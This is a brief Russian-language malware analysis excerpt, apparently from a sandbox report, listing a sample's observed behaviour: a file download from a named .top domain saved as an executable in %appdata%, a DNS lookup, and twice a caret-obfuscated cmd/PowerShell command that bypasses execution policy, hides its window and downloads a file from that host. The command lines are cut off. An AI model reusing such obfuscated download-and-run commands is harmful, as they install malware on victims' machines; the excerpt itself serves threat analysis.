Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWERS^heLL.^E^xe -E^XEc^UTi^O^nP^o^L^Icy b^yp^ASs^ -NOPR^of^ILe^ ^-^win^Dow^s^Ty^Le^ hi^DDE^n (ne^W-ob^JEC^T s^YsT^e^m.^nE^t.WeBCliENt^)^.d^oWNLOAd^fIle^('http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "POWERS^heLL.^E^xe -E^XEc^UTi^O^nP^o^L^Icy b^yp^ASs^ -NOPR^of^ILe^ ^-^win^Dow^s^Ty^Le^ hi^DDE^n (ne^W-ob^JEC^T s^YsT^e^m.^nE^t.WeBCliENt^)^.d^oWNLOAd^fIle^('http://hometower...' (со скрытым окном)